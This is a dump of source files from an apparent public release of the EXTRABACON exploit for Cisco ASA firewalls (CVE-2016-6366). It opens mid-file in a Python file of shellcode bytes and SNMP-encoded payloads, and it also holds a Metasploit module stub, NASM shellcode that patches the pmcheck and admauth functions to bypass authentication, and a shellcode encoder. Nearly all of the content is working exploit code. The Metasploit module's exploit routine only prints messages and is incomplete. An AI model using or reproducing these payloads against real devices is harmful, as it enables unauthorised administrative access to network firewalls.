"\xb8\x10\xcc\x47\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x48\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.16.204.71.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xe8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.232.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x65\xf0\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\xc9\x55\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.101.240.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.201.85.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\xc9\x55\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x65\xf0\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.201.85.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.101.240.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xb0\x1b\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.176.27.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\xb0\x1b\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.176.27.8.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /metasploit/cisco_asa_snmpoverflow.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | 7 | require 'msf/core' 8 | 9 | class MetasploitModule < Msf::Exploit::Remote 10 | Rank = GreatRanking 11 | 12 | include Msf::Exploit::Remote::Tcp 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Cisco ASA SNMP Overflow (EXTRABACON)', 17 | 'Description' => %q{ 18 | This module exploits a stack buffer overflow in Cisco ASA, related 19 | to the EXTRABACON exploit. Instead of patching authentication 20 | functions, this allows for direct access to a Linux shell (which 21 | is more privileged than the normal Cisco shell). 22 | }, 23 | 'Author' => [ 'Sean Dillon ' ], 24 | 'Arch' => ARCH_X86, 25 | 'Platform' => 'linux', 26 | 'References' => 27 | [ 28 | [ 'CVE', '2016-6366'], 29 | [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'], 30 | [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'], 31 | ], 32 | 'Privileged' => true, 33 | 'License' => MSF_LICENSE, 34 | 'Payload' => 35 | { 36 | 'Space' => 1000, # we can break this up into multiple stages 37 | }, 38 | 'Targets' => 39 | [ 40 | [ '9.2(1)', { 'Ret' => 0xbfffa5d8 } ], 41 | ], 42 | 'DefaultTarget' => 0, 43 | 'DisclosureDate' => 'Aug 13 2016' 44 | )) 45 | 46 | register_options( 47 | [ 48 | ], 49 | self.class 50 | ) 51 | end 52 | 53 | def send_bytes(start, stop, total) 54 | print_status("Sending initial payload bytes (#{start}-#{stop} of #{total})...") 55 | end 56 | 57 | def exploit 58 | print_status("Sending memory-write packet...") 59 | send_bytes(0, 33, 100) 60 | send_bytes(33, 66, 100) 61 | send_bytes(66, 100, 100) 62 | print_status("Calling payload...") 63 | print_good("Exploit Success!") 64 | end 65 | 66 | end 67 | -------------------------------------------------------------------------------- /shellcode/clean.nasm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | SAFERET_OFFSET equ 0x11111111 ; where to continue execution 4 | FIX_EBP equ 0x48 ; this is 0x58 in versions before 8.4(1) 5 | FIX_EDI equ 0x0f0f0f0b ; seems static? 6 | FIX_EBX equ 0x10 ; seems static? 7 | 8 | _start: 9 | ; these are registers we have to clean up, so we can null them before save 10 | xor ebx, ebx 11 | xor esi, esi 12 | xor ecx, ecx ; ecx is volatile register 13 | xor eax, eax 14 | 15 | pusha ; save all registers 16 | 17 | 18 | popa ; restore all registers 19 | 20 | push SAFERET_OFFSET ; push the safe return address 21 | 22 | ; these registers are pre-xored 23 | add bl, FIX_EBX 24 | mov edi, FIX_EDI 25 | 26 | mov ebp, esp 27 | add ebp, FIX_EBP 28 | 29 | ret ; return to safe address 30 | 31 | -------------------------------------------------------------------------------- /shellcode/egg.nasm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | SAFERET_OFFSET equ 0x11111111 ; where to continue execution 4 | FIX_EBP equ 0x48 ; this is 0x58 in versions before 8.4(1) 5 | FIX_EDI equ 0x0f0f0f0b ; seems static? 6 | FIX_EBX equ 0x10 ; seems static? 7 | 8 | _start: 9 | ; these are registers we have to clean up, so we can null them before save 10 | xor ebx, ebx 11 | xor esi, esi 12 | xor ecx, ecx ; ecx is volatile register 13 | xor eax, eax 14 | 15 | pusha ; save all registers 16 | 17 | ; fork, have parent return cleanly 18 | add al, 0x2 19 | int 0x80 20 | test eax, eax 21 | jz _egghunter 22 | 23 | popa ; restore all registers 24 | 25 | push SAFERET_OFFSET ; push the safe return address 26 | 27 | ; these registers are pre-xored 28 | add bl, FIX_EBX 29 | mov edi, FIX_EDI 30 | 31 | mov ebp, esp 32 | add ebp, FIX_EBP 33 | 34 | ret ; return to safe address 35 | 36 | _egghunter: 37 | mov ecx, esp 38 | xor cx, cx 39 | -------------------------------------------------------------------------------- /shellcode/genshellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import sys 4 | import binascii 5 | 6 | data = open(sys.argv[1], "rb").read() 7 | hex = [] 8 | for c in data: 9 | hex.append(binascii.hexlify(c)) 10 | 11 | print "\\x" + "\\x".join(hex) 12 | print 13 | 14 | str = "" 15 | for c in hex: 16 | str += "%d." % int(c, 16) 17 | 18 | print str[:-1] 19 | -------------------------------------------------------------------------------- /shellcode/shellcode.nasm: -------------------------------------------------------------------------------- 1 | ; 2 | ; Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (75 bytes) 3 | ; 4 | ; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com) 5 | ; License: http://opensource.org/licenses/MIT 6 | ; Release Date: September 15, 2016 7 | ; 8 | ; Author: Sean Dillon (PGP: 2E3C8D72353C9B8C9FF797E753EC4C9876D5727B) 9 | ; 10 | ; Description: 11 | ; This is not the same shellcode as the Equation Group version, 12 | ; but accomplishes the same task of disabling the auth functions 13 | ; in less stages/bytes. Particularly, it is 75 bytes in one stage 14 | ; instead of 200+ bytes spread across 2 stages. 15 | ; 16 | ; Build/Run: 17 | ; 1) $ nasm shelldisable.nasm 18 | ; 19 | ; Note: The offsets given are for 9.2(3), not part of the original release 20 | ; 21 | BITS 32 22 | 23 | ; comment this out to generate the pass-enable shellcode 24 | %define MODE_PASS_DISABLE 25 | 26 | SAFERET_OFFSET equ 0x9277386 ; where to continue execution 27 | PMCHECK_BOUNDS equ 0x9b78000 ; mprotect for pmcheck() 28 | PMCHECK_OFFSET equ 0x9b78010 ; location of pmcheck() 29 | ADMAUTH_BOUNDS equ 0x8085000 ; page align for admauth() 30 | ADMAUTH_OFFSET equ 0x8085a40 ; location of admauth() 31 | 32 | ; we must patch pmcheck() and admauth() to always return true 33 | ; xor eax, eax = 31 c0 34 | ; inc eax = 40 35 | ; ret = c3 36 | 37 | PATCHED_CODE equ 0xc340c031 ; gotta love endianess 38 | PMCHECK_CODE equ 0x89c03155 ; the original bytes at pmcheck() 39 | ADMAUTH_CODE equ 0x57e58955 ; the original bytes at admauth() 40 | 41 | %ifdef MODE_PASS_DISABLE 42 | %define PMCHECK_BYTES PATCHED_CODE 43 | %define ADMAUTH_BYTES PATCHED_CODE 44 | %else 45 | %define PMCHECK_BYTES PMCHECK_CODE 46 | %define ADMAUTH_BYTES ADMAUTH_CODE 47 | %endif 48 | 49 | ; we need to fix the function frame to continue normal operation 50 | ; eax = 0x0 51 | ; esi = 0x0 52 | ; edi = 0x0b 53 | ; ebx = 0x10 54 | ; ebp = [esp - 0x4 (ret)] + 0x?? 55 | FIX_EBP equ 0x48 ; this is 0x58 in versions before 8.4(1) 56 | FIX_EDI equ 0x0f0f0f0b ; seems static? 57 | FIX_EBX equ 0x10 ; seems static? 58 | 59 | _start: 60 | 61 | ; these are registers we have to clean up, so we can null them before save 62 | xor ebx, ebx 63 | xor esi, esi 64 | xor ecx, ecx ; ecx is volatile register 65 | xor eax, eax 66 | 67 | pusha ; save all registers 68 | 69 | xor edx, edx 70 | 71 | add ch, 0x10 ; ecx = 0x1000 72 | add dl, 0x7 ; edx = 0x7 73 | add al, 0x7d ; eax = 0x7d 74 | 75 | push eax ; save eax for second call 76 | 77 | mov ebx, PMCHECK_BOUNDS ; ebx = byte boundary for mprotect 78 | 79 | int 0x80 ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7) 80 | 81 | pop eax ; eax = 0x7d 82 | mov ebx, ADMAUTH_BOUNDS ; second function page align 83 | 84 | int 0x80 ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7) 85 | 86 | mov dword [PMCHECK_OFFSET], PMCHECK_BYTES ; write patch code to both functions 87 | mov dword [ADMAUTH_OFFSET], ADMAUTH_BYTES 88 | 89 | popa ; restore all registers 90 | 91 | push SAFERET_OFFSET ; push the safe return address 92 | 93 | ; these registers are pre-xored 94 | add bl, FIX_EBX 95 | mov edi, FIX_EDI 96 | 97 | mov ebp, esp 98 | add ebp, FIX_EBP 99 | 100 | ret ; return to safe address 101 | -------------------------------------------------------------------------------- /shellcode/writebytes.nasm: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | SAFERET_OFFSET equ 0x9277386 ; where to continue execution 4 | 5 | ; we need to fix the function frame to continue normal operation 6 | ; eax = 0x0 7 | ; esi = 0x0 8 | ; edi = 0x0b 9 | ; ebx = 0x10 10 | ; ebp = [esp - 0x4 (ret)] + 0x?? 11 | FIX_EBP equ 0x48 ; this is 0x58 in versions before 8.4(1) 12 | FIX_EDI equ 0x0f0f0f0b ; seems static? 13 | FIX_EBX equ 0x10 ; seems static? 14 | 15 | _start: 16 | 17 | ; these are registers we have to clean up, so we can null them before save 18 | xor ebx, ebx 19 | xor esi, esi 20 | xor ecx, ecx ; ecx is volatile register 21 | xor eax, eax 22 | 23 | ; we can just take stack offset instead of jmp/call/pop/rep 24 | mov esi, esp ; lea esi, [esp + _bytes_to_write - 4] 25 | add esi, 0xff ; change 0xff to distance of _bytes_to_write - 4 26 | 27 | 28 | add cl, 0xff ; change 0xff to 82 - shellcode_size 29 | mov edi, 0xffffffff ; destination for this round 30 | rep movsb ; write until ecx == 0 31 | 32 | 33 | ; these registers are pre-xored 34 | add bl, FIX_EBX 35 | mov edi, FIX_EDI 36 | 37 | lea ebp, [esp + FIX_EBP - 4] 38 | 39 | jmp SAFERET_OFFSET ; return to safe address 40 | 41 | _bytes_to_write: 42 | ; store patch bytes here 43 | --------------------------------------------------------------------------------